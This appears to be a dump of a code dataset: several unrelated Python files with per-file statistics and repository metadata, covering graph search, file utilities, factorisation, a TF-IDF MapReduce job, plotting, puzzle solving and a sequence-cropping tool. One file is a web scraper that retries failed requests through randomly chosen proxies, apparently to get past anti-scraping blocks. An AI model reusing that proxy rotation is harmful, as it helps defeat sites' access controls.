while self._waiting_messages:
message = self._waiting_messages.pop(self._previous_message_number + 1)
result = self._handle_message(message)
if result is not None:
return result
except KeyError:
pass
def _handle_message(self, message):
"""Pass a message to its handler and update the previous message number.
:param dict message:
:return dict|None:
"""
self._previous_message_number += 1
try:
return self._message_handlers[message["type"]](message)
except KeyError:
logger.warning("Received a message of unknown type %r.", message["type"])
def _handle_log_message(self, message):
"""Deserialise the message into a log record and pass it to the local log handlers, adding `[REMOTE] to the
start of the log message.
:param dict message:
:return None:
"""
record = logging.makeLogRecord(message["log_record"])
record.msg = f"[{self.service_name}] {record.msg}"
logger.handle(record)
def _handle_exception(self, message):
"""Raise the exception from the responding service that is serialised in `data`.
:param dict message:
:raise Exception:
:return None:
"""
exception_message = "\n\n".join(
(
message["exception_message"],
f"The following traceback was captured from the remote service {self.service_name!r}:",
"".join(message["traceback"]),
)
)
try:
raise EXCEPTIONS_MAPPING[message["exception_type"]](exception_message)
# Allow unknown exception types to still be raised.
except KeyError:
raise type(message["exception_type"], (Exception,), {})(exception_message)
def _handle_result(self, message):
"""Convert the result to the correct form, deserialising the output manifest if it is present in the message.
:param dict message:
:return dict:
"""
logger.info("Received an answer to question %r.", self.subscription.topic.path.split(".")[-1])
if message["output_manifest"] is None:
output_manifest = None
else:
output_manifest = Manifest.deserialise(message["output_manifest"], from_string=True)
return {"output_values": message["output_values"], "output_manifest": output_manifest}
| 43.162791
| 208
| 0.653556
| 2,403
| 20,416
| 5.40283
| 0.161049
| 0.013171
| 0.008473
| 0.009859
| 0.257953
| 0.181006
| 0.141262
| 0.109066
| 0.097666
| 0.091196
| 0
| 0.003635
| 0.272335
| 20,416
| 472
| 209
| 43.254237
| 0.870288
| 0.309218
| 0
| 0.180851
| 0
| 0.003546
| 0.119457
| 0.018928
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056738
| false
| 0.003546
| 0.070922
| 0.003546
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 90124bdf01042879c8d23bc0de43bbfc19264166 | size: 1,978 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): A01746540/SEM9Algoritmos, path Tareas/DistanciaGrafos.py, head 2aaf1a344413dfbece77022a5b34e0c5318aa5e5, licenses ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
from collections import defaultdict


class Graph:
    metro = ['El Rosario', 'Instituto del Petroleo', 'Tacuba', 'Hidalgo', 'Tacubaya', 'Deportivo 18 de Marzo',
             'Centro Medico', 'Mixcoac', 'Balderas', 'Bellas Artes', 'Guerrero', 'Martin Carrera', 'Zapata',
             'Chabacano',
             'Salto del Agua', 'Garibaldi', 'La Raza', 'Pino Suarez', 'Consulado', 'Candelaria', 'Ermita',
             'Santa Anita', 'Oceania', 'Morelos',
             'San Lazaro', 'Jamaica', 'Atlalilco', 'Pantitlan']

    def __init__(self):
        self.graph = defaultdict(list)

    def addEdge(self, u, v):
        # add an edge to the graph
        for val in v:
            self.graph[u].append(val)

    def BFS(self, s):
        # run the BFS
        d = []
        for i in range(100):
            d.append(0)
        d[s] = 0
        queue = []
        visited = [False] * (max(self.graph) + 1)
        queue.append(s)
        visited[s] = True
        while queue:
            s = queue.pop(0)
            print(s, end=" ")
            for v in self.graph[s]:
                if visited[v] == False:
                    queue.append(v)
                    visited[v] = True
                    d[v] = d[s] + 1
        print("\nNodo inicial: El Rosario")
        for i in range(28):
            print(f"Desde el Rosario hasta {self.metro[i]} es {d[i]}")


g = Graph()
g.addEdge(0, [1, 2])
g.addEdge(1, [14, 15])
g.addEdge(2, [3, 4])
g.addEdge(3, [11, 12])
g.addEdge(4, [5, 6, 9])
g.addEdge(5, [8, 9])
g.addEdge(6, [7])
g.addEdge(7, [25])
g.addEdge(8, [10, 21, 25, 26])
g.addEdge(9, [3, 10])
g.addEdge(11, [10, 21])
g.addEdge(12, [13, 14])
g.addEdge(13, [11])
g.addEdge(14, [15, 17])
g.addEdge(15, [16])
g.addEdge(17, [16, 18, 19])
g.addEdge(18, [23])
g.addEdge(19, [13, 20])
g.addEdge(20, [18, 23])
g.addEdge(21, [10, 22])
g.addEdge(22, [19, 20])
g.addEdge(23, [24])
g.addEdge(24, [8, 22])
g.addEdge(25, [27])
g.addEdge(26, [24, 27])
print("BFT:")
g.BFS(0)
| 25.688312
| 110
| 0.517695
| 289
| 1,978
| 3.529412
| 0.408305
| 0.196078
| 0.011765
| 0.021569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 0.290192
| 1,978
| 77
| 111
| 25.688312
| 0.630342
| 0.020222
| 0
| 0
| 0
| 0
| 0.183884
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.016393
| 0
| 0.098361
| 0.065574
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 9012e5a8ed3f5ec28adee161865cc14545390e2d | size: 1,691 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): Battleman/InternetAnalyticsW, path lab04/submited/utils.py, head 005e5de6c0e591be6dc303ec46cc82249e70f666, licenses ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
# ######################
# Some useful utilities.
# ######################
import json, os, pickle


def listPrettyPrint(l, n):
    """Prints a list l on n columns to improve readability"""
    if(n == 5):
        for a,b,c,d,e in zip(l[::5],l[1::5],l[2::5],l[3::5],l[4::5]):
            print('{:<22}{:<22}{:<22}{:<22}{:<}'.format(a,b,c,d,e))
    if(n == 4):
        for a,b,c,d in zip(l[::4],l[1::4],l[2::4],l[3::4]):
            print('{:<30}{:<30}{:<30}{:<}'.format(a,b,c,d))
    if(n == 3):
        for a,b,c in zip(l[::3],l[1::3],l[2::3]):
            print('{:<30}{:<30}{:<}'.format(a,b,c))
    if(n == 2):
        for a,b in zip(l[::2],l[1::2]):
            print('{:<40}{:<}'.format(a,b))
    if(len(l)%n != 0): #print remaining
        for i in range(len(l)%n):
            print(l[-(len(l)%n):][i], end='\t')


def save_json(objects, path):
    """
    Save a list of objects as JSON (.txt).
    """
    # Remove the file if it exists
    if os.path.exists(path):
        os.remove(path)
    for obj in objects:
        # 'a' stands for 'append' to the end of the file
        # '+' to create the file if it doesn't exist
        with open(path, 'a+') as f:
            f.write(json.dumps(obj))
            f.write('\n')


def load_json(path):
    """
    Read a JSON from a text file. Expect a list of objects.
    """
    with open(path) as f:
        lines = f.readlines()
    return [json.loads(s) for s in lines]


def save_pkl(obj, path):
    """
    Save an object to path.
    """
    with open(path, 'wb') as f:
        pickle.dump(obj, f)


def load_pkl(path):
    """
    Load a pickle from path.
    """
    with open(path, 'rb') as f:
        return pickle.load(f)
| 25.621212
| 69
| 0.474867
| 286
| 1,691
| 2.793706
| 0.286713
| 0.020025
| 0.022528
| 0.020025
| 0.066333
| 0.032541
| 0
| 0
| 0
| 0
| 0
| 0.040362
| 0.282082
| 1,691
| 65
| 70
| 26.015385
| 0.617792
| 0.209935
| 0
| 0
| 0
| 0
| 0.070492
| 0.040984
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0
| 0.029412
| 0
| 0.235294
| 0.147059
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 9012f44f49fd46b9f38512bc6891494632f15f28 | size: 489 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): miloszlakomy/algutils, path primes/factorisation.py, head f83c330a0ca31cdac536de811f447820c70ecb38, licenses ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
#!/usr/bin/env python3

from algutils.primes import cached_primes


def factorise(n):
    if n <= 0:
        raise ValueError("n must be a positive integer")

    ps = cached_primes.get_primes_list(min_lim=int(n**.5) + 1)

    ret = {}
    for p in ps:
        if n == 1:
            break
        if p**2 > n:  # n is prime
            break
        if n % p == 0:
            n //= p
            v = 1
            while n % p == 0:
                n //= p
                v += 1
            ret[p] = v

    if n > 1:  # n is prime
        ret[n] = 1

    return ret
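A quick usage note (not part of the stored file): `factorise` returns a mapping from prime factor to exponent. The module path below is inferred from the repo layout and assumes the `algutils` package providing `cached_primes` is importable.

```python
# Hypothetical check; the import path is an assumption based on the repo layout.
from algutils.primes.factorisation import factorise

print(factorise(360))  # expected {2: 3, 3: 2, 5: 1}, since 360 == 2**3 * 3**2 * 5
print(factorise(97))   # expected {97: 1}, because 97 is prime
```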
| 13.971429
| 60
| 0.492843
| 83
| 489
| 2.843373
| 0.481928
| 0.050847
| 0.033898
| 0.033898
| 0.059322
| 0.059322
| 0.059322
| 0
| 0
| 0
| 0
| 0.039216
| 0.374233
| 489
| 34
| 61
| 14.382353
| 0.732026
| 0.087935
| 0
| 0.190476
| 0
| 0
| 0.063348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.047619
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 90192683a9596914db24fa7e2c76ff1a12788127 | size: 355 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): Kyle-Kyle/angr, path angr/engines/soot/statements/goto.py, head 345b2131a7a67e3a6ffc7d9fd475146a3e12f837, licenses ["BSD-2-Clause"]
max_stars_count: 6,132 (2015-08-06T23:24:47.000Z to 2022-03-31T21:49:34.000Z) | max_issues_count: 2,272 (2015-08-10T08:40:07.000Z to 2022-03-31T23:46:44.000Z) | max_forks_count: 1,155 (2015-08-06T23:37:39.000Z to 2022-03-31T05:54:11.000Z)
content:
import logging

from .base import SimSootStmt

l = logging.getLogger('angr.engines.soot.statements.goto')


class SimSootStmt_Goto(SimSootStmt):
    def _execute(self):
        jmp_target = self._get_bb_addr_from_instr(instr=self.stmt.target)
        self._add_jmp_target(target=jmp_target,
                             condition=self.state.solver.true)
| 25.357143
| 73
| 0.704225
| 45
| 355
| 5.288889
| 0.622222
| 0.113445
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202817
| 355
| 13
| 74
| 27.307692
| 0.840989
| 0
| 0
| 0
| 0
| 0
| 0.09322
| 0.09322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 901943c57d651786afa2ce40b989408f3ebb4e7f | size: 979 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): fisher60/pyweek-2021, path game/entity/player.py, head 294b45d768a7e0d85ac67dc4b12384e68fc4f399, licenses ["MIT"]
max_stars_count: 8 (2021-03-27T21:20:28.000Z to 2021-03-31T08:09:26.000Z) | max_issues_count: 49 (2021-03-27T21:18:08.000Z to 2021-04-03T02:53:53.000Z) | max_forks_count: 1 (2021-04-02T21:58:39.000Z to 2021-04-02T21:58:39.000Z)
content:
import arcade

from ..constants import TILE_SIZE, PLAYER_SCALING
from ..utils import Vector


class PlayerInventory:
    keys: int = 0


class Player(arcade.Sprite):
    def __init__(self, *args, **kwargs):
        super().__init__(
            "game/assets/sprites/square.png", PLAYER_SCALING, *args, **kwargs
        )
        self.inventory: PlayerInventory = PlayerInventory()

    @property
    def position(self) -> Vector:
        return Vector(int(self.center_x), int(self.center_y))

    def update(self):
        ...

    def handle_user_input(self, key: int, modifiers: int):
        """
        Handle events passed from the MainWindow.
        :return:
        """
        if key == arcade.key.UP:
            self.center_y += TILE_SIZE
        elif key == arcade.key.DOWN:
            self.center_y -= TILE_SIZE
        elif key == arcade.key.LEFT:
            self.center_x -= TILE_SIZE
        elif key == arcade.key.RIGHT:
            self.center_x += TILE_SIZE
| 25.763158
| 77
| 0.597549
| 116
| 979
| 4.844828
| 0.431034
| 0.106762
| 0.085409
| 0.080071
| 0.220641
| 0.16726
| 0.124555
| 0.124555
| 0.124555
| 0
| 0
| 0.001437
| 0.28907
| 979
| 37
| 78
| 26.459459
| 0.806034
| 0.051073
| 0
| 0
| 0
| 0
| 0.033445
| 0.033445
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.12
| 0.04
| 0.44
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 901cb3458a6cbbc2527b80d00c06a9a4f1e903b2 | size: 2,389 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): vadlamak/strata-teaching-the-elephant-to-read, path code/tfidf/tfidf.py, head 5f3963c90c520ac1b7b41d21939230ef5df6414f, licenses ["Apache-2.0"]
max_stars_count: null | max_issues_count: 1 (2021-03-26T00:26:00.000Z to 2021-03-26T00:26:00.000Z) | max_forks_count: null
content:
import math
import string
from itertools import groupby
from operator import itemgetter
from nltk.corpus import stopwords
from nltk.tokenize import wordpunct_tokenize

N = 10788.0  # Number of documents, in float to make division work.


class TermMapper(object):
    def __init__(self):
        if 'stopwords' in self.params:
            with open(self.params['stopwords'], 'r') as excludes:
                self._stopwords = set(line.strip() for line in excludes)
        else:
            self._stopwords = None
        self.curdoc = None

    def __call__(self, key, value):
        if value.startswith('='*34):
            self.curdoc = int(value.strip("=").strip())
        else:
            for word in self.tokenize(value):
                if not word in self.stopwords:
                    yield (word, self.curdoc), 1

    def normalize(self, word):
        word = word.lower()
        if word not in string.punctuation:
            return word

    def tokenize(self, sentence):
        for word in wordpunct_tokenize(sentence):
            word = self.normalize(word)
            if word: yield word

    @property
    def stopwords(self):
        if not self._stopwords:
            self._stopwords = stopwords.words('english')
        return self._stopwords


class UnitMapper(object):
    def __call__(self, key, value):
        term, docid = key
        yield term, (docid, value, 1)


class IDFMapper(object):
    def __call__(self, key, value):
        term, docid = key
        tf, n = value
        idf = math.log(N/n)
        yield (term, docid), idf*tf


class SumReducer(object):
    def __call__(self, key, values):
        yield key, sum(values)


class BufferReducer(object):
    def __call__(self, key, values):
        term = key
        values = list(values)
        n = sum(g[2] for g in values)
        for g in values:
            yield (term, g[0]), (g[1], n)


class IdentityReducer(object):
    def __call__(self, key, values):
        for value in values:
            yield key, value


def runner(job):
    job.additer(TermMapper, SumReducer, combiner=SumReducer)
    job.additer(UnitMapper, BufferReducer)
    job.additer(IDFMapper, IdentityReducer)


def starter(prog):
    excludes = prog.delopt("stopwords")
    if excludes: prog.addopt("param", "stopwords="+excludes)


if __name__ == "__main__":
    import dumbo
    dumbo.main(runner, starter)
| 25.688172
| 72
| 0.612809
| 291
| 2,389
| 4.883162
| 0.309278
| 0.038001
| 0.046446
| 0.059113
| 0.120338
| 0.106967
| 0.052076
| 0.052076
| 0.052076
| 0
| 0
| 0.007598
| 0.283801
| 2,389
| 92
| 73
| 25.967391
| 0.822911
| 0.021766
| 0
| 0.144928
| 0
| 0
| 0.025696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173913
| false
| 0
| 0.101449
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 901eab214940948112dfada28e162b16759ac77e | size: 589 | ext: py | lang: Python
max_stars repo: tanupoo/tools-pubsec, path plot-wbgt.py, head 3dfea4b677226395eff89f90aebec3105ba4f4d5, licenses ["MIT"] | max_issues / max_forks repo: tanupoo/pubsec-tools, same path, head and licenses
max_stars_count: 1 (2021-05-27T21:10:04.000Z to 2021-05-27T21:10:04.000Z) | max_issues_count: null | max_forks_count: null
content:
#!/usr/bin/env python
import sys
import json
import matplotlib.pyplot as plt
result = json.load(sys.stdin)
x = result["hour"]
y = result["wbgt"]
fig = plt.figure(figsize=(8, 4))
ax1 = fig.add_subplot(1,1,1)
ax1.set_xlabel("hour")
ax1.set_ylabel("wbgt")
ax1.set_xticks(list(range(0,24,1)))
ax1.set_yticks(list(range(15,41,5)))
ax1.set_yticks(list(range(15,41,1)), minor=True)
ax1.set_xlim(1,24)
ax1.set_ylim(15,40)
ax1.grid(b=True, axis="x", which="major")
ax1.grid(b=True, axis="y", which="major")
ax1.grid(b=True, axis="y", which="minor")
ax1.plot(x,y)
plt.tight_layout()
plt.show()
| 21.035714
| 48
| 0.696095
| 114
| 589
| 3.517544
| 0.464912
| 0.104738
| 0.05985
| 0.089776
| 0.311721
| 0.27182
| 0.27182
| 0.147132
| 0.147132
| 0
| 0
| 0.070632
| 0.086587
| 589
| 27
| 49
| 21.814815
| 0.674721
| 0.033956
| 0
| 0
| 0
| 0
| 0.059965
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 90204f12090cacf498331393d685af08f22c49b2 | size: 1,005 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): GuillaumeGandon/advent-of-code-2015, path day_07/day_07.py, head ff4201a9a27d1ca7f687a613eeec72dd12fe1487, licenses ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
from functools import cache


def split_row(row):
    instructions, output = row.split(' -> ')
    return output, tuple(instructions.split(' '))


@cache
def solve(key):
    if key.isdigit():
        return int(key)
    else:
        instructions = circuit[key]
        if len(instructions) == 1:
            return solve(instructions[0])
        elif len(instructions) == 2:
            gate, wire_or_signal = instructions
            return 65535 - solve(wire_or_signal)
        else:
            a, gate, b = instructions
            if gate == 'AND':
                return solve(a) & solve(b)
            elif gate == 'OR':
                return solve(a) | solve(b)
            elif gate == 'LSHIFT':
                return solve(a) << int(b)
            else:
                return solve(a) >> int(b)


circuit = dict(map(split_row, open('input').read().splitlines()))

print(f"Answer part one: {solve('a')}")

solve.cache_clear()
circuit['b'] = ('16076',)

print(f"Answer part two: {solve('a')}")
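A small worked example (not part of the stored file): if the functions above are defined and the file-reading lines at the bottom are skipped, a toy circuit shows the gate semantics the solver implements. The wire names and values below are made up for illustration.

```python
# Hypothetical toy circuit; the real script reads the puzzle from a file named 'input'.
rows = ["123 -> x", "456 -> y", "x AND y -> d", "x OR y -> e",
        "x LSHIFT 2 -> f", "NOT x -> h"]
circuit = dict(map(split_row, rows))
solve.cache_clear()
print(solve('d'))  # 72     (123 & 456)
print(solve('e'))  # 507    (123 | 456)
print(solve('f'))  # 492    (123 << 2)
print(solve('h'))  # 65412  (65535 - 123)
```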
| 25.769231
| 65
| 0.536318
| 118
| 1,005
| 4.508475
| 0.389831
| 0.067669
| 0.090226
| 0.06391
| 0.157895
| 0.097744
| 0.097744
| 0
| 0
| 0
| 0
| 0.018978
| 0.318408
| 1,005
| 38
| 66
| 26.447368
| 0.757664
| 0
| 0
| 0.1
| 0
| 0
| 0.084577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.033333
| 0
| 0.366667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 90215693db46543c286a97842122238df6972cc0 | size: 523 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): stefanv/noteout, path noteout/tests/test_nb_only.py, head b76b35c675fa1221be35835d56c2937e3f56b317, licenses ["BSD-2-Clause"]
max_stars_count: 3 (2021-08-14T19:35:37.000Z to 2021-08-23T16:53:51.000Z) | max_issues_count: 1 (2021-11-23T18:40:45.000Z to 2021-11-23T20:40:48.000Z) | max_forks_count: 1 (2021-11-23T18:33:58.000Z to 2021-11-23T18:33:58.000Z)
content:
""" Test nb-only filter
"""
from io import StringIO
from noteout.nb_only import NbonlyFilter as nnbo
from .tutils import (read_md, assert_json_equal, filter_doc)
def test_nb_only():
content = """/
Some text [notebook only]{.nb-only}more text.
::: nb-only
Only in notebook.
:::
More text.
"""
doc = read_md(StringIO(content))
filtered = filter_doc(doc, nnbo)
exp_content = """/
Some text more text.
More text.
"""
exp_doc = read_md(StringIO(exp_content))
assert_json_equal(filtered, exp_doc)
| 17.433333
| 60
| 0.692161
| 77
| 523
| 4.493506
| 0.363636
| 0.086705
| 0.057803
| 0.098266
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179732
| 523
| 29
| 61
| 18.034483
| 0.806527
| 0.036329
| 0
| 0.210526
| 0
| 0
| 0.262097
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 9021bc3863fa351375d2c840439601cf105a7273 | size: 3,241 | ext: py | lang: Python
max_stars repo: wakeblade/weiboSpiderAndCook, path backend/fastspider.py, head b5ca0708abd0a938eb0ac611d037a5d3daf9384f, licenses ["MIT"] | max_issues / max_forks repo: wakeblade/weiboWordCount, same path, head and licenses
max_stars_count: 1 (2020-02-08T16:22:19.000Z to 2020-02-08T16:22:19.000Z) | max_issues_count: null | max_forks_count: null
content:
# !/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
from gevent import monkey
monkey.patch_all()
from gevent.queue import Queue
"""
import requests
import time
import random
proxies=[]
with open('./ips.txt') as f:
proxies = [line.split('@')[0] for line in f]
def randomProxy(proxies):
ip = random.choice(proxies)
return {'https':ip,'http':ip}
class Task:
def __init__(self,url=None,method='get',params=None,data=None,cookie=None):
self.url=url
self.method=method
self.params=params
self.data=data
self.cookie=cookie
def __str__(self):
return str(self.__dict__)
class Spider:
methods ={
'get':requests.get,
'post':requests.post,
'put':requests.put,
'delete':requests.delete,
'head':requests.head
}
config ={
'ERROR_DELAY':10, #反爬延迟
'PAGE_DELAY':1, #单页延迟
'RANDOM_SEED':3, #单页延迟
}
def __init__(self,header=None,proxy=None,timeout=None,config=None):
self.header=header
self.proxy=proxy
self.timeout=timeout
if config:
self.update(config)
def __str__(self):
return str(self.__dict__)
def url(self,url):
task =Task(url)
return self.task(task)
def task(self,task):
if task.url==None:
raise('Error:爬虫任务url不能为空!')
self.method ='get' if task.method==None else task.method
kwargs={'url':task.url}
if self.header:
kwargs['headers']=self.header
if self.proxy:
kwargs['proxies']=self.proxy
if self.timeout:
kwargs['timeout']=self.timeout
if task.params:
kwargs['params']=task.params
if task.cookie:
kwargs['cookies']=task.cookie
if task.data:
kwargs['data']=task.data
#print("\n{} \n- {}\n".format(self,task))
delay=random.randint(0,self.config['RANDOM_SEED'])
while True:
try:
res = self.methods[self.method](**kwargs)
except Exception as e:
#print(e)
kwargs['proxies']=randomProxy(proxies)
print('(延迟{}s)==={}==={}'.format(str(delay),kwargs['proxies'],task.url))
delay+=1
time.sleep(delay*self.config['ERROR_DELAY'])
else:
time.sleep(delay*self.config['PAGE_DELAY'])
break
return res
"""
url = 'http://icanhazip.com'
header ={
'Accept':'*/*',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Language':'zh-CN',
'Accept-Encoding':'gzip, deflate',
#'Connection': 'Keep-Alive',
'Connection': 'close',
'Cache-Control': 'no-cache',
'User-Agent':'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.01)'
}
task1=Task(url=url,method='post')
task2=Task(url)
#spider = Spider(header,randomProxy(proxies),(2,2))
spider = Spider()
#print(spider.task(task2).text)
print(spider.url(url).text)
#t = timeit.timeit(stmt='spider(task1.proxies(randomProxy(proxies)))',setup='from __main__ import spider,task1,randomProxy,proxies',number=10)
#print(t)
"""
| 28.429825
| 142
| 0.573588
| 393
| 3,241
| 4.641221
| 0.348601
| 0.023026
| 0.012061
| 0.017544
| 0.055921
| 0.029605
| 0.029605
| 0
| 0
| 0
| 0
| 0.012642
| 0.267819
| 3,241
| 114
| 143
| 28.429825
| 0.756005
| 0.05523
| 0
| 0.055556
| 0
| 0
| 0.085813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097222
| false
| 0
| 0.041667
| 0.027778
| 0.263889
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 9022b8901ebe6c1ee9599a4efe5b224353a4bd15 | size: 8,328 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): jjavier-bm/crops, path crops/command_line/crops-cropstr.py, head 658a98f9c168cc27b3f967e7a60a0df896ef5ac6, licenses ["BSD-3-Clause"]
max_stars_count: null | max_issues_count: 5 (2020-07-17T08:45:22.000Z to 2022-03-11T13:39:26.000Z) | max_forks_count: 1 (2020-07-07T15:42:07.000Z to 2020-07-07T15:42:07.000Z)
content:
"""==========
This script will remove a number of residues from a sequence file
in agreement to the intervals and other details supplied.
"""
from crops.about import __prog__, __description__, __author__, __date__, __version__
import argparse
import os
from crops.io import check_path
from crops.io import outpathgen
from crops.io import parsers as cin
from crops.io import taggers as ctg
from crops.core import ops as cop
from crops import command_line as ccl
logger=None
def create_argument_parser():
"""Create a parser for the command line arguments used in crops-renumber"""
parser = argparse.ArgumentParser(prog=__prog__, formatter_class=argparse.RawDescriptionHelpFormatter,
description=__description__+' ('+__prog__+') v.'+__version__+'\n'+__doc__)
parser.add_argument("input_seqpath",nargs=1, metavar="Sequence_filepath",
help="Input sequence filepath.")
parser.add_argument("input_strpath",nargs=1, metavar="Structure_filepath",
help="Input structure filepath or dir. If a directory is inserted, it will act on all structure files in such directory.")
parser.add_argument("input_database",nargs=1, metavar="Intervals_database",
help="Input intervals database filepath.")
parser.add_argument("-o","--outdir",nargs=1,metavar="Output_Directory",
help="Set output directory path. If not supplied, default is the one containing the input sequence.")
sections=parser.add_mutually_exclusive_group(required=False)
sections.add_argument("-t","--terminals",action='store_true',default=False,
help="Ignore interval discontinuities and only crop the ends off.")
sections.add_argument("-u","--uniprot_threshold", nargs=2, metavar=("Uniprot_ratio_threshold","Sequence_database"),
help='Act if SIFTS database is used as intervals source AND %% residues from single Uniprot sequence is above threshold. Threshold: [MIN,MAX)=[0,100). Database path: uniclust##_yyyy_mm_consensus.fasta-path or server-only. The latter requires internet connexion.')
parser.add_argument('--version', action='version', version='%(prog)s '+ __version__)
return parser
def main():
parser = create_argument_parser()
args = parser.parse_args()
global logger
logger = ccl.crops_logger(level="info")
logger.info(ccl.welcome())
inseq=check_path(args.input_seqpath[0],'file')
indb=check_path(args.input_database[0],'file')
instr=check_path(args.input_strpath[0])
if args.uniprot_threshold is not None:
insprot=check_path(args.uniprot_threshold[1]) if args.uniprot_threshold[1] != 'server-only' else 'server-only'
else:
insprot=None
minlen=float(args.uniprot_threshold[0]) if args.uniprot_threshold is not None else 0.0
targetlbl=ctg.target_format(indb,terms=args.terminals, th=minlen)
infixlbl=ctg.infix_gen(indb,terms=args.terminals)
if args.outdir is None:
outdir=check_path(os.path.dirname(inseq),'dir')
else:
outdir=check_path(os.path.join(args.outdir[0],''),'dir')
###########################################
logger.info('Parsing sequence file '+inseq)
seqset=cin.parseseqfile(inseq)
logger.info('Done')
logger.info('Parsing structure file '+instr)
strset, fileset=cin.parsestrfile(instr)
logger.info('Done')
logger.info('Parsing interval database file '+indb)
if len(seqset)>0:
intervals=cin.import_db(indb,pdb_in=seqset)
else:
raise ValueError('No chains were imported from sequence file.')
